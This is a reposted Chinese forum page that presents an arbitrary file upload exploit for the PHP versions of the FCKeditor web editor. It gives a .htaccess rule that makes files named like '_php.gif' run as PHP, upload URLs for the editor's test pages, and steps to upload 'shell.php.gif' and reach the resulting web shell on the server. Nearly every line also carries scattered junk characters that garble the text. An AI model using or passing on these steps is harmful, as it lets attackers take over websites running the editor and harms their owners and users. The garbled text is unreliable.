FCKeditor所有php版本Upload上传漏洞" o/ j! K# Q! I2 Z! E& [5 D
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
N5 }' s& u: z) }& h5 N减小字体 增大字体' I1 E3 Q8 d8 ^. V( q" T( E
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability5 H0 `# X7 _5 r+ c
[+] Date: 2011
$ x0 |2 \$ B6 B" Y1 @/ B) v[+] Author : sinesafe.cn
1 B/ j. H3 v0 V* I' ~! H+ Z6 j[+] Website : WwW.sinesafe.cn
@* @/ K ~5 | N" ~% l———————————————————: {: f$ {2 ~) u4 D( L) k$ C
1.create a htaccess file:
. ^3 X, @; k* U0 Z# \1 Xcode:
* N3 H# z3 {" d) @2 G, M<FilesMatch “_php.gif”>
1 l" k) t9 v2 J9 DSetHandler application/x-httpd-php5 s0 b9 w" F( D, d/ r
</FilesMatch>
" x( p, A6 f H V: z' ~* l3 X y* u1 x) a9 W3 O
2.Now upload this htaccess with FCKeditor.
! [1 d. G( J" h8 Y; K; m ?+ Q5 B! ?9 r1 X/ y8 i
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
7 b6 _) x2 I. G- k: w1 g" K5 x8 W; H+ K" \/ m3 ?/ j! J
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html7 Z0 T+ X% u. u$ Y- E8 z
' C' p6 \! W' B8 ]6 C2 b+ ?6 g———————————————————————————————-, }) v' q' Z! a- `8 E3 w# a9 i
3.Now upload shell.php.gif with FCKeditor.+ p2 O6 W e1 F# z
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically., f4 U( N3 F, y* b9 C: {
5.http://www.sinesafe.cn/anything/shell_php.gif% j& B9 F- P j
6.Now shell is available from server. |
; q7 }' N4 G( a7 K
# k6 u6 P1 w" s% G
^; I) R1 c6 T5 w |
发表于 2013-10-27 17:25:21
收藏
支持
反对